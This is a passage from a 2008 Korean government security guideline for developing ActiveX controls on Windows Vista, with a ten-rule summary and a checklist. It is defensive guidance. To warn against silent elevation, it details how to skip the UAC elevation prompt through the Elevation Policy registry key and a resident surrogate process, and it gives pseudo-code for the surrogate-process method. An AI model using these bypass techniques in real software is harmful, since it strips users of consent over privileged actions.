그림 27] SiteLock Template 적용 (5) 58

59 제 8 절 신뢰할수있는사이트추가 남용금지 제 8 절 신뢰할수있는사이트추가 남용금지 1. 개요 윈도우비스타의강화된보안정책으로 ActiveX Control의설치및실행에제한을받게되자개발자들은대대적인수정작업에들어가야했다. 불행히도일부개발자들은윈도우비스타용 ActiveX Control을수정하는대신자신의 ActiveX Control이설치되거나실행되는사이트를신뢰할수있는사이트로추가하였다. 신뢰할수있는사이트에서는윈도우 Vista에서추가된보안기능들이대부분해제되어기존의 ActiveX Control들도대부분정상적으로동작하기때문이다. 인터넷익스플로러는웹사이트를보안수준에따라인터넷영역, 로컬인트라넷영역, 신뢰할수있는사이트영역, 제한된사이트영역의 4가지영역으로나누고있다. 대부분의사이트는인터넷영역에서실행되며, 인터넷영역에서는높은보안수준이제공된다. 신뢰할수있는사이트는사용자스스로해당사이트가안전하다고특별히지정하는사이트로써, 인터넷영역보다보안설정이낮아지며특히윈도우비스타에서는보호모드가해제된다. 보호모드가해제되면윈도우비스타에서추가된대부분의보안정책이무력화된다. 따라서이문제를해결하기위해서는보안설정을낮추는방식이아니라, 신뢰할수있는사이트가아니더라도 ActiveX Control의정상적인실행이가능하도록 ActiveX Control 을수정하여야한다. 제 4 장안전한 ActiveX Control 개발을위한십계명 2. 검증항목 ActiveX Control의설치및실행을위해서해당웹사이트를신뢰할수있는사이트에추가하도록강요하지말아야한다. ActiveX Control의설치를위해서보안설정을낮출필요가있다면설치후에는반드시보안설정을원래대로복구하여야한다. ActiveX Control의실행을위해서보안설정을낮출필요가있다면보안설정을낮추는방법대신권한상승창을통해 ActiveX Control의권한을높이는방법으로구현하여야한다. 59

60 제 4 장 안전한 ActiveX Control 개발을위한십계명 3. 검증항목간과시위험성 신뢰할수있는사이트는일반인터넷보다보안수준이낮게설정되어있다. ActiveX Control을실행하기위해해당웹사이트를신뢰할수있는사이트에추가하도록강제한다면결과적으로해당웹사이트의보안수준을강제적으로낮추게되는것이며이로인하여보안에취약할가능성은높아진다. 또한, 윈도우비스타의경우신뢰할수있는사이트는보호모드가적용되지않는다. 일반적으로해당웹사이트에취약점이발생하는경우라도낮은 Integrity의제약을받지만, 신뢰할수있는사이트에추가되어보호모드가해제되면중간 Integrity의권한을가지므로사용자권한의폴더및레지스트리에대한접근권한을가지므로특히위험하다. ActiveX Control의설치를위해부득이하게보안설정을낮추어야한다면, 설치후에는반드시보안설정을복구하여야한다. 왜냐하면변경된보안설정은인터넷익스플로러에반영구적으로적용되므로해당 ActiveX Control 뿐만아니라인터넷사용전반에보안설정이낮아지기때문이다. 만약 ActiveX Control이보안설정을낮추어야만실행가능하다면이는올바르지않은실행방법이므로대신권한상승창으로사용자동의를얻어서높은권한을얻는방법으로구현되어야한다. 4. 사례 가. 대화상자를통해신뢰할수있는사이트로추가를강제하는예 [ 그림 28] 은 ActiveX Control의실행을위해서해당사이트를신뢰할수있는사이트로등록하라고대화상자를통해강제하는예를보여준다. 사용자가 [ 그림 28] 좌측하단의 동의합니다 를체크하지않으면대화상자의 확인 버튼을누를수없으며이후사이트를이용하는데 ActiveX Control이정상적으로설치되지않거나정상적으로실행되지않는등의장애가발생한다. 즉, 신뢰할수있는사이트에추가하지않으면해당사이트의서비스를이용할수없게되는것이다. 60

61 제 8 절 신뢰할수있는사이트추가 남용금지 [ 그림 28] 신뢰할수있는사이트추가를강제하는예 신뢰할수있는사이트에추가하는것은곧보안설정수준이낮아지고보호모드가해제되는것을의미한다. 따라서이는사용자의선택의문제이지해당웹사이트를구성하는일부응용 S/W인 ActiveX Control이강요하거나강제해서는안된다. 이문제를해결하고올바르게구현하려면, ActiveX Control이신뢰할수있는사이트의추가없이도설치및실행이가능하도록프로그램을수정하여야한다. 부득이하게 ActiveX Control의설치를위해보안설정을낮출필요가생긴다면, 설치후에는반드시보안설정을원래대로복구하도록하여야한다. 그리고 ActiveX Control이보안설정을낮추어야만실행가능하다면이는올바르지않는실행방법이므로권한상승창으로사용자동의를얻어서높은권한을얻어서실행되도록프로그램을수정하여야한다. 제 4 장안전한 ActiveX Control 개발을위한십계명 61

62 제 4 장 안전한 ActiveX Control 개발을위한십계명 제 9 절권한상승창에대한우회금지 1. 개요 윈도우비스타의보호모드하에서인터넷익스플로러는낮은 Integrity의사용자권한으로실행되며, ActiveX Control 또한낮은 Integrity의사용자권한을가진다. 이로인하여, ActiveX Control이 Program Files 하위의파일이나 HKEY_LOCAL_MACHINE 하위의레지스트리와같은높은권한을가지는로컬자원을다루기위해서는권한상승이필요하다. 보안적인관점에서 ActiveX Control의권한상승을사용자동의가필요한안전한권한상승과사용자동의가필요없는취약한권한상승으로구분하였으며, 각각에대한설명은다음과같다. 가. 사용자동의가필요한안전한 ActiveX Control의권한상승안전한권한상승은사용자동의가필요하다. 여기서사용자동의란 ActiveX Control이권한상승이필요할때, 권한상승창이팝업되고사용자가허용을해야만권한상승이일어나는것을의미한다. [ 그림 29] 는윈도우비스타에서볼수있는여러가지형태의권한상승창의예이다. 62

63 제 9 절권한상승창에대한우회금지 [ 그림 29] 권한상승창 Microsoft 는 ActiveX Control의안전한권한상승을위하여 CoCreateInstanceAsAdmin 이라는 API를제공한다. 일반적으로 ActiveX Control을생성할때는 CoCreateInstance를통해구현하지만 CoCreateInstanceAsAdmin을대신사용하게되면, ActiveX Control은사용자동의후에관리자권한으로실행될수있다. 안전한권한상승의또다른방법은 ActiveX Control이 Medium Integrity 이상의대리자프로세스를생성하여 ActiveX Control이해야할작업을대리자프로세스가대신수행하게끔구현하는것이다. ActiveX Control이 ShellExecute() API를통하여권한이높은대리자프로세스를시작하려하면, 권한상승창이뜨게되고사용자동의후에대리자프로세스가높은권한으로실행될수있다. ActiveX Control의안전한권한상승은보안강화에도움이된다. 왜냐하면이경우 ActiveX Control이치명적인보안취약점을가지고있다할지라도사용자동의없이는실행되지않기때문이다. 즉, 공격자가 ActiveX Control의보안취약점을이용하여 exploit 하더라도낮은 Integrity의낮은권한에서동작하며, 높은권한을가지는주요로컬자원에쓰기작업을하거나높은권한으로동작하기위해서는권한상승창이팝업되는것을피할수없다. 제 4 장안전한 ActiveX Control 개발을위한십계명 63

64 제 4 장 안전한 ActiveX Control 개발을위한십계명 나. 사용자동의가필요없는취약한 ActiveX Control 의권한상승 취약한권한상승은 ActiveX Control이사용자동의없이높은권한이필요한작업을수행하는것을말한다. 보안적인관점에서취약한권한상승은권한상승창을우회하는효과를가진다. 취약한권한상승의한가지방법은 Elevation Policy 레지스트리키를이용하는것이다. 이방법은 Medium Integrity의사용자권한이필요할때사용된다. Microsoft 는레지스트리키설정을통하여 ActiveX Control의권한상승방법을제공하며, 그레지스트리경로는 HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\Elevation Policy\ {GUID of ActiveX Control}\ 이다. 해당 ActiveX Control이실행할대리자프로세스의이름을상기레지스트리경로의 AppName 에대리자프로세스의경로를 AppPath 에등록하고, Policy 값을 3으로설정하면, 해당 ActiveX Control은권한상승창을통한사용자동의없이대리자프로세스를중간 Integrity의사용자권한으로실행할수있다. ( 참고 : Policy 값을 2로설정하면권한상승창을통해대리자프로세스를 Medium Integrity의사용자권한으로실행할수있다. 또한 Policy 값을 1로설정하면대리자프로세스를낮은 Integrity로실행할수있다.) 취약한권한상승의또다른방법은사용자시스템에상주하는 Medium Integrity 이상의높은권한의대리자프로세스와통신하여높은권한이필요한작업을수행하는방법이다. ActiveX Control이최초설치되는시점에는관리자권한을갖기때문에상주하는높은권한의대리자프로세스를설치할수있다. 대리자프로세스가상주한다는것은매번재부팅되는시점에대리자프로세스가높은권한으로실행된다는것을의미한다. [ 그림 3] 과같이 ActiveX Control은대리자프로세스와의통신을통하여대리자프로세스에게명령을내림으로써권한상승창을통한사용자동의없이높은권한이필요한작업을수행할수있게된다. 위와같은형태의암시적인권한상승을위한 ActiveX Control과대리자프로세스간의대표적인통신방법으로는파일공유, 레지스트리키공유, 윈도우메시지, 네임드파이프, 파일매핑 ( 메모리맵파일 ), RPC(Remote Procedure Call) 가있다. 윈도우비스타에서는일반적으로낮은권한의프로세스가높은권한의프로세스로통신하는것이제한되지만통신자원을낮은권한으로설정함으로써이를허용하도록개발할수있다. 64

65 제 9 절권한상승창에대한우회금지 일반적인사용자입장에서빈번하게팝업되는권한상승창은번거로운것이사실이다. 따라서개발자는사용자편의성을위해권한상승창이팝업되는수가최소화되도록 ActiveX Control을설계하고싶어하며, 이런의미에서자동권한상승은매력적이다. 하지만, ActiveX Control의암시적권한상승은보안적인관점에서보았을때위험하다. 왜냐하면, 보통의경우 ActiveX Control이보안취약점을가지고있다할지라도보호모드때문에높은권한으로동작하는것이제한되는반면, 암시적인자동권한상승을사용하는 ActiveX Control이보안취약점을가지는경우는사용자동의없이도높은권한으로악성행위를수행하게할수있기때문이다. 따라서 ActiveX Control 개발시이러한암시적인권한상승의위험성을반드시고려해야할것이다. 2. 검증항목 Elevation Policy 레지스트리키를 ActiveX Control이권한상승창을통해사용자동의없이 Medium Integrity의사용자권한을가지는프로세스 (.exe) 를실행할수있도록설정하지말아야한다. Medium Integrity 이상의권한을가진대리자프로세스 (.exe) 를사용자시스템에상주하게하여, ActiveX Control이권한상승창을통한사용자동의없이대리자프로세스와의통신으로높은권한이필요한일을처리하도록개발하지말아야한다. 제 4 장안전한 ActiveX Control 개발을위한십계명 3. 검증항목간과시위험성 보통의경우 ActiveX Control이보안취약점을가지고있다할지라도보호모드때문에높은권한으로동작하는것이제한되는반면, 권한상승창을우회하는 ActiveX Control이보안취약점을가지는경우는사용자동의없이도높은권한으로악성행위를수행하게할수있다. 즉, 권한상승창을우회하지않는경우는공격자가 ActiveX Control의보안취약점을이용하더라도사용자시스템에큰피해를입히기어렵지만, 권한상승창을우회하도록설계된 ActiveX Control이보안취약점을가지는경우는공격자에의해사용자시스템이장악되어중요파일의변조나삭제등치명적인피해를입힐수있다. 65

66 제4 장 안전한 ActiveX Control 개발을 위한 십계명 4. 사례 가. Elevation Policy 레지스트리 키를 이용하여 권한 상승 창 우회 후 중간 Integrity의 대리자 프로세스를 실행하는 예 [그림 31]은 Elevation Policy 레지스트리 키를 이용한 암시적인 권한 상승의 한 예를 보여 준다. 레지스트리 HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\Elevation Policy\{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}\ 경로에 AppName 은 ClientX.XXXexe, AppPath 는 C:\Program Files\XXXX\ActiveX, Policy 는 3 으로 설정되어 있다. 즉, GUID가 {xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}인 ActiveX Control이 C:\Program ActiveX Control 개발 보안가이드라인 Files\XXXX\ActiveX 폴더에 있는 ClientXXXX.exe 를 사용자 동의 없이 Medium Integrity의 사용자 권한으로 실행할 수 있음을 의미한다. 암시적인 권한 상승은 권한 상승 창을 우회하므로 위험하다. 따라서 안전한 권한 상승 으로 변경하여야 한다. 만약에 대리자 프로세스가 Medium Integrity의 권한이 필요 없다 면 Policy 를 1 로, 대리자 프로세스가 Medium Integrity의 권한이 필요하다면 Policy 를 2 로 변경함으로써 명시적인 권한 상승으로의 변경이 손쉽게 가능하다. [그림 30] Elevation Policy를 통한 권한 상승 예 66 ActiveX Control 개발 보안가이드라인

67 제 9 절권한상승창에대한우회금지 나. 상주하는높은권한의대리자프로세스에윈도우메시지를전달하여권한상승창을우회한후자동업데이트를수행하는예 [ 표 3] 은윈도우메시지를통한대리자프로세스와의통신예를보여주는의사코드를보여준다. 대리자프로세스는 ChangeWindowMessageFilter를통하여낮은권한의프로세스로부터의 WM_COPYDATA 메시지를허용한다. WM_COPYDATA 메시지는문자열을전송하는데사용되는윈도우메시지이다. 스크립트를통해 ActiveX Control에서 method( ) 가호출되면 ActiveX Control은 FindWindow() API로대리자프로세스의윈도우포인터를찾고, 대리자프로세스에 SendMessage() API를통하여내용이 문자열인 WM_COPYDATA 메시지를전달한다. 이후메시지를전달받은대리자프로세스는 을인터넷에서다운받아 ActiveX Control 프로그램에대한업데이트를수행한다. 상주하는대리자프로세스 ActiveX Control [ 표 3] 대리자프로세스를통한권한상승예 의사코드 (Pseudo Code) ChangeWindowMessageFilter(WM_COPYDATA, MSGFLT_ADD); /* Allow to receive WM_COPYDATA message from processes with low integrity WM_COPYDATA message is used for the string transmission */ method(update_url) {... // message to send to Surrogate Process CString str = update_url; /* ex) If you call method( ) in script str will be */ COPYDATASTRUCTURE cds; // set structure for WM_COPYDATA cds.cbdata = str.getlength()+1; cds.lpdata = (LPSTR)(LPCSTR)str; 제 4 장안전한 ActiveX Control 개발을위한십계명 // Get the window pointer of the surrogate process CWnd *pwnd = FindWindow([surrogate process name], NULL); // Send message SendMessage(pWnd->m_hWnd, WM_COPYDATA, (WPARAM)m_hWnd, (LPARAM)&cds); } 67

68 제4 장 안전한 ActiveX Control 개발을 위한 십계명 해당 ActiveX Control의 자동 업데이트 모듈에 보안 취약점을 가지는 경우, 악의적인 공 격자는 스크립트 상에서 method( )를 호출되게 함 으로써 공격자의 웹서버 로부터 변조된 update.inf 파일을 사용 자 시스템에 설치하고, 변조된 정보에 의해 악성코드를 사용자 시스템에 설치할 수 있다. 이 과정은 높은 권한을 가진 대리자 프로세스에 의해 수행되며 사용자 동의를 구하는 권 한 상승 창이 없기 때문에 사용자 모르게 수행되므로 매우 위험하다. 암시적인 권한 상승은 권한 상승 창을 우회하므로 위험하다. 따라서 명시적인 권한 상 승으로 변경하여야 한다. 이 예의 경우에는 ActiveX Control과 대리자 프로세스 간의 통신 을 사용하지 않게 수정하거나, 대리자 프로세스가 상주하지 않도록 수정하는 방법을 사 ActiveX Control 개발 보안가이드라인 용하여 명시적인 권한 상승으로 변경할 수 있다. 68 ActiveX Control 개발 보안가이드라인

69 제 10 절 ActiveX Control 의남용금지 제 10 절 ActiveX Control 의남용금지 1. 개요 과거프로그램을 ActiveX Control 형태로개발했던이유는다음의 3가지로요약할수있다. 첫째, 사용자시스템의자원을아무런제약없이이용할수있기때문이다. 둘째, 윈도우의 GUI 컴포넌트를그대로사용할수있기때문이다. 셋째, 패키지시장이사장되면서개발업체에게 ActiveX Control이좋은수익모델이되었기때문이다. 하지만, ActiveX Control은 3가지주요한문제점을안고있다. 첫째, 보안에매우취약하다. 그동안 ActiveX Control에서발견되었던취약점들은수백종에달한다. 둘째, 이종운영체제와웹브라우저간의호환성이전혀없다. 셋째, Microsoft 에서조차 ActiveX Control의역기능을우려하고있으며보안상의제약이앞으로점점심해질것이다. 이러한문제에도불구하고인터넷상에서 ActiveX Control이단기간내에아예사라지지는않을것이확실하다. 왜냐하면 ActiveX Control이할수있는일을완전히대체할수있으면서도안전한대체기술이현존하지않기때문이다. 안전한사이버공간을위해서는불필요한 ActiveX Control의개발을줄이고대체기술로전환하는것이바람직하다. ActiveX Control은사용자시스템의자원을접근해야하고다른대체수단이없는경우에만선택되어야하며, 그외에는 Ajax, Flash/FLEX, SilverLight 등의더나은대체기술로전환되어야옳다. 그리고부득이하게 ActiveX Control을개발할때에는개발초기부터보안을염두에두고설계및구현해야한다. 안전한 ActiveX Control의개발을위해서는개발자와보안책임자스스로보안의식과책임감을가지는것이무엇보다도필요하다. 제 4 장안전한 ActiveX Control 개발을위한십계명 69

70 제 4 장 안전한 ActiveX Control 개발을위한십계명 2. 검증항목 프로그램설계시 ActiveX Control 이외에다른대체기술로구현가능한지확인하여야한다. ActiveX Control은사용자시스템의자원을이용해야하고, 다른대체수단이없는경우에만개발되어야한다. ActiveX Control을개발할때에는해당 ActiveX Control은정상적인사용자뿐만아니라공격자또한이용할수있음을염두하고, 해당기능이악용될소지는없는지충분한고려가선행되어야한다. 3. 검증항목간과시위험성불필요한 ActiveX Control의개발은더많은보안취약점을발생시키는원인이된다. 또한정상적인 ActiveX Control의기능일지라도접근할수있는자원의범위를제한하지않으면공격자에의해악용될소지가높다. ActiveX Control은보안에취약하고호환성이전혀없어서 Microsoft 에종속적이며현시대의웹기술이나웹표준이고려되지않은프로그램이므로, 시스템의자원을이용할필요가없는웹응용프로그램을개발할경우보안성이강화되고호환성이좋은대체기술을사용하는것이바람직하다. 4. 사례가. 대체기술이활용된웹사이트의예 ActiveX Control의대체기술로알려진 Ajax, Flash/FLEX, SilverLight가적용된웹사이트의예는각각 [ 그림 31], [ 그림 32], [ 그림 33] 과같다. 70

71 제10절 ActiveX Control의 남용 금지 제4장 안전한 ActiveX Control 개발을 위한 십계명 [그림 31] Ajax가 적용된 지도검색 사이트 [그림 32] FLEX가 적용된 영화예매 사이트 ActiveX Control 개발 보안가이드라인 71

72 제 4 장 안전한 ActiveX Control 개발을위한십계명 [ 그림 33] SilverLight 가적용된방송다시보기사이트 [ 그림 31] 은 Ajax로구현된지도검색사이트, [ 그림 32] 는 FLEX로구현된영화예매사이트, [ 그림 33] 은 SilverLight로구현된방송다시보기사이트를보여준다. 기존에는 ActiveX Control로구현되었던 GUI나멀티미디어웹응용프로그램이보다나은기능을지원하는대체기술로전환되어가고있음을확인할수있다. Ajax, Flash/FLEX, SilverLight와같은웹응용기술들은 ActiveX Control과는다르게샌드박스모델 12) 이적용되어웹으로부터사용자시스템에대한접근이불가하므로공격자의공격으로부터보다안전하다. 예와같이사용자시스템의자원을이용할필요가없는웹응용프로그램을개발할경우에는보안성이강화되고호환성이좋으며더화려한 GUI를지원하는최신의대체기술로개발하는것이바람직하다. 12) 샌드박스모델 : 보안을강화하기위해가상화등을통하여프로세스가접근할수있는시스템자원을한정하는기법참고 URL= 72

73 2008 부 록 1. 윈도우비스타에서의안전한 ActiveX Control 개발을위한십계명 2. 윈도우비스타에서의안전한 ActiveX Control 개발을위한체크리스트

74

75 [ 부록 1] 윈도우비스타에서의안전한 ActiveX Control 개발을위한십계명 75

76

77 부록 1 윈도우 Vista 에서의안전한 ActiveX Control 개발을위한십계명 십계명 1 입력으로문자열을받아처리하는경우에는지정된길이를넘지않는지확인하는루틴이항상포함되어야한다. 가이드라인제 4 장 1 절참조 버퍼오버플로우란? 문자열을입력인자로받아처리하는함수가할당한메모리보다더큰문자열을입력으로받게되어프로그램의스택또는힙영역이문자열로덮어쓰여져서실행오류를일으키는것을말한다. 위험성 버퍼오버플로우위협은 ActiveX Control의가장대표적인취약요소이며, 문자열을입력받는파라미터, 프라퍼티, 메소드등이매우긴문자열을올바르게처리하지못해발생한다. 공격자는버퍼오버플로우를이용하여해당 ActiveX Control이실행될때자신이원하는악성코드를실행할수있다. 부록 1 윈도우비스타에서의안전한 ActiveX Control 개발을위한십계명 77

78 부록 십계명 2 임의의프로세스를실행할수있는기능을제공하지말아야한다. 가이드라인제 4 장 2 절참조 임의의프로세스실행기능이란? 스크립트입력값을통해실행파일의경로또는이름을받고해당실행파일을실행하는기능을말한다. 위험성 일반적으로임의의프로세스를실행하는기능은불필요하다. 공격자는프로세스실행취약점을악용함으로써악성프로세스를실행하여사용자시스템에악성코드를설치할수있다. 78

79 부록 1 윈도우 Vista 에서의안전한 ActiveX Control 개발을위한십계명 십계명 3 임의의파일을읽을수있는기능을제공하지말아야한다. 가이드라인제 4 장 3 절참조 임의의파일읽기기능이란? 스크립트입력값을통해파일의경로또는이름을받고해당파일의내용을평문이나 Base64 등으로인코딩하여리턴하는기능을의미한다. 위험성 권한이낮은 ActiveX Control도권한의높은폴더의파일에대한읽기권한을가진다. ActiveX Control이공격자에의해악용되어서사용자 PC의중요파일의내용이유출될위험이있다. 부록 1 윈도우비스타에서의안전한 ActiveX Control 개발을위한십계명 79

80 부록 십계명 4 임의의레지스트리를읽을수있는기능을제공하지말아야한다. 가이드라인제 4 장 4 절참조 임의의레지스트리읽기기능이란? 스크립트입력값을통해레지스트리의경로또는이름을받고해당레지스트리의내용을평문이나 Base64 등으로인코딩하여리턴하는기능을말한다. 위험성 권한이낮은 ActiveX Control도권한의높은레지스트리내용에대한읽기권한을가진다. ActiveX Control이공격자에의해악용되어서사용자 PC의중요레지스트리의내용이유출될위험이있다. 80

81 부록 1 윈도우 Vista 에서의안전한 ActiveX Control 개발을위한십계명 십계명 5 ActiveX Control을통해인터넷에서다운로드받는업데이트파일에대해서는서명값검증을통해신뢰성을확인하여야한다. 가이드라인제 4 장 5 절참조 업데이트파일이란? 다운로드 URL, 설치경로등의업데이트정보를담고있는파일또는업데이트를위해인터넷을통해다운로드되는파일을의미한다. 위험성 업데이트파일은 ActiveX Control 프로그램을변조할수있다. 업데이트서버를스크립트를통해변경할수있는경우공격자는악성프로그램을업데이트파일인것처럼위장하여사용자시스템에설치, 악성행위를수행할수있다. 부록 1 윈도우비스타에서의안전한 ActiveX Control 개발을위한십계명 81

82 부록 십계명 6 ActiveX Control 프로그램은관리자권한의폴더에설치되어야한다. 가이드라인제 4 장 6 절참조 관리자권한의폴더란? 관리자권한이란운영체제의 Administrator 권한을의미하며관리자권한의폴더란관리자만이해당폴더의파일을쓰고실행할수있는폴더를의미한다. 위험성 낮은권한의폴더에설치된실행파일및 DLL 파일은권한이낮은프로세스에의해쉽게변조될수있다. 공격자에의해변조된실행파일및 DLL 파일은해당 ActiveX Control이호출될때실행되어악성행위를수행하게된다. 82

83 부록 1 윈도우 Vista 에서의안전한 ActiveX Control 개발을위한십계명 십계명 7 ActiveX Control 은설치된웹사이트에서만실행되고, 그외웹사이트에서는실행을제한해야한다. 가이드라인제 4 장 7 절참조 SiteLock Template이란? SiteLock Template은 ActiveX Control이스크립트로실행되는도메인을제한해주는 ATL 템플릿이다. 위험성 대부분의 ActiveX Control은설치된웹사이트에서만필요하며그외웹사이트에서는실행될필요가없다. 실행가능한웹사이트의제한이없다면공격자는일반이메일이나다른웹사이트의게시물을이용하여 ActiveX Control을실행, 악성행위를수행할수있다. 부록 1 윈도우비스타에서의안전한 ActiveX Control 개발을위한십계명 83

84 부록 십계명 8 ActiveX Control의실행을위해서해당웹사이트를신뢰할수있는사이트에추가하도록강제하지말아야한다. 가이드라인제 4 장 8 절참조 신뢰할수있는사이트란? IE는웹사이트를인터넷, 로컬인트라넷, 신뢰할수있는사이트, 제한된사이트의 4가지영역으로나누고있다. 신뢰할수있는사이트는인터넷영역보다보안수준이낮으며사용자스스로해당사이트가안전하다고특별히지정한사이트이다. 위험성 신뢰할수있는사이트는보호모드가해제되어인터넷영역보다보안수준이낮게설정된다. ActiveX Control을실행하기위해해당웹사이트를신뢰할수있는사이트에추가하도록강제한다면결과적으로해당웹사이트의보안수준을낮추게되며, 보안에취약할가능성이높아진다. 신뢰하는웹사이트목록 84

85 부록 1 윈도우 Vista 에서의안전한 ActiveX Control 개발을위한십계명 십계명 9 ActiveX Control 사용시권한상승창을우회하지말아야한다. 가이드라인제 4 장 9 절참조 권한상승창이란? 윈도우비스타에서는낮은권한의객체가높은권한의객체의자원을사용하려는경우권한상승이필요하며이때사용자동의를구하는창을의미한다. 위험성 사용자계정컨트롤 (UAC) 정책에의하면사용자는높은권한의프로세스가실행될때사용자로부터권한상승창을통해동의를구해야한다. 하지만편의상권한상승창이생성되지않게하는방법들이존재한다. 보안적관점으로볼때 ActiveX Control이높은권한의프로세스를생성할때는권한상승창을띄우는것이바람직하다. 권한상승창을우회하는방법을 ActiveX Control 이제공하고해당 ActiveX Control이보안에취약하다면결과적으로권한상승창을우회하는악성행위도가능하다. 부록 1 윈도우비스타에서의안전한 ActiveX Control 개발을위한십계명 85

86 부록 십계명 10 불필요한 ActiveX Control 프로그램은개발하지말아야한다. 가이드라인제 4 장 10 절참조 불필요한 ActiveX Control 이란? 특정서비스및소프트웨어개발시 ActiveX Control 이외의대체기술이있음에도불구하고 ActiveX Control로개발된프로그램을의미한다. 위험성 ActiveX Control은자원에대한무제한적인접근이가능하므로악의적인공격에취약하다. 불필요한 ActiveX Control 개발은더많은보안취약점을발생시키는원인이될수있다. 86

87 [ 부록 2] 윈도우비스타에서의안전한 ActiveX Control 개발을위한체크리스트 87

88

89 부록 2 윈도우 Vista 에서의안전한 ActiveX Control 개발을위한체크리스트 내용 세부점검항목 HTML 에서 <param> 태그를통해파라미터로문자열을입력으로받아처리하는경우프로그램에서할당한크기를넘지않는지확인하는루틴이항상포함되어있는가? 체크 ( 유 / 무 ) 문자열입력값에대한크기검증 임의의프로세스실행기능금지 임의의파일읽기기능금지 스크립트에서프라퍼티 (property) 가문자열을입력으로받아처리하는경우프로그램에서할당한크기를넘지않는지확인하는루틴이항상포함되어있는가? 스크립트에서메소드 (method) 가인자로문자열을입력으로받아처리하는경우프로그램에서할당한크기를넘지않는지확인하는루틴이항상포함되어있는가? 임의의프로세스실행기능을제한하고있는가? HTML 의 <param> 태그나스크립트상에서메소드, 프라퍼티를통하여사용자시스템에있는임의의실행파일에대한경로및이름, 실행인자를입력으로받고해당실행파일을실행하는기능 특정경로내의실행파일에대하여프로세스실행기능을제공하는경우입력값에.. 을사용할수없도록제한하고있는가? HTML 의 <param> 태그나스크립트상에서메소드, 프라퍼티를통하여실행파일에대한경로및이름, 실행인자를입력으로받고해당실행파일을실행하는기능 임의의파일읽기기능을제한하고있는가? HTML 의 <param> 태그나스크립트상에서메소드, 프라퍼티를통하여사용자시스템에있는임의의파일에대한경로및이름을입력으로받고해당파일의내용을메소드의리턴값이나프라퍼티로출력하는기능 특정폴더내의파일에대하여읽기기능을제공하는경우입력값에.. 을사용할수없도록제한하고있는가? HTML 의 <param> 태그나스크립트상에서메소드, 프라퍼티를통하여파일에대한경로및이름을입력으로받고해당파일의내용을메소드의리턴값이나프라퍼티로출력하는기능 부록 2 윈도우비스타에서의안전한 ActiveX Control 개발을위한체크리스트 89

90 부록 내용 세부점검항목 체크 ( 유 / 무 ) 임의의레지스트리읽기기능금지 업데이트파일에대한신뢰성검증 관리자권한의폴더에프로그램설치 임의의레지스트리읽기기능을제한하고있는가? HTML 의 <param> 태그나스크립트상에서메소드, 프라퍼티를통하여사용자시스템에있는임의의레지스트리에대한경로및이름을입력으로받고해당레지스트리의내용을메소드의리턴값이나프라퍼티로출력하는기능 특정경로내의레지스트리에대하여레지스트리읽기기능을제공하는경우입력값에.. 을사용할수없도록제한하고있는가? HTML 의 <param> 태그나스크립트상에서메소드, 프라퍼티를통하여레지스트리에대한경로및이름을입력으로받고해당레지스트리의내용을메소드의리턴값이나프라퍼티로출력하는기능 HTML 의 <param> 태그나스크립트상에서메소드인자, 프라퍼티를통하여업데이트 URL 정보를입력받는경우, 디지털서명을이용하여업데이트파일의신뢰성을확보하였는가? ActiveX Control 프로그램 (exe, dll, ocx 등의파일 ) 은관리자권한의폴더 ( C:\Windows\ 의하위폴더또는 C:\Program Files\ 의하위폴더 ) 에설치되도록제한하였는가? 7 실행가능한웹사이트제한 Microsoft 의 SiteLock Template 를활용하여 ActiveX Control 이실행가능한웹사이트를제한하였는가? ActiveX Control 의설치및실행을위해서해당웹사이트를신뢰할수있는사이트에추가하는기능을제한하고있는가? 8 신뢰할수있는사이트추가남용금지 ActiveX Control 의설치를위해서보안설정을낮출필요가있는경우설치후에반드시보안설정을원래대로복구하고있는가? ActiveX Control 의실행을위해서보안설정을낮출필요가있는경우보안설정을낮추는방법대신권한상승창을통해 ActiveX Control 의권한을높이는방법으로구현하고있는가? 90

91 부록 2 윈도우 Vista 에서의안전한 ActiveX Control 개발을위한체크리스트 내용 세부점검항목 체크 ( 유 / 무 ) 9 10 권한상승창우회금지 불필요한 ActiveX Control 남용금지 권한상승창을통해사용자동의없이 ActiveX Control 이 Medium Integrity 의사용자권한을가지는프로세스 (.exe) 를실행할수있도록 Elevation Policy 레지스트리키를사용하지않았음을확인하였는가? Medium Integrity 이상의권한을가진대리자프로세스 (.exe) 를사용자시스템에상주하게하여, ActiveX Control 이사용자동의없이높은권한이필요한일을처리하도록개발하지않았음을확인하였는가? 개발되는 ActiveX Control 이사용자시스템의자원을이용할필요가명확히있고, 다른대체수단이없는것을확인하였는가? ActiveX Control 은정상적인사용자뿐만아니라악의적인공격자또한이용할수있음을염두하고, 해당기능이악용될소지는없는지충분히고려하였는가? 부록 2 윈도우비스타에서의안전한 ActiveX Control 개발을위한체크리스트 91

92

93 발행일자 발행기관 2008 년 11 월발행 국가사이버안전센터 국가보안기술연구소 본문서에대한기술문의는아래이메일로해주십시오. analysis@ncsc.go.kr activex@ensec.re.kr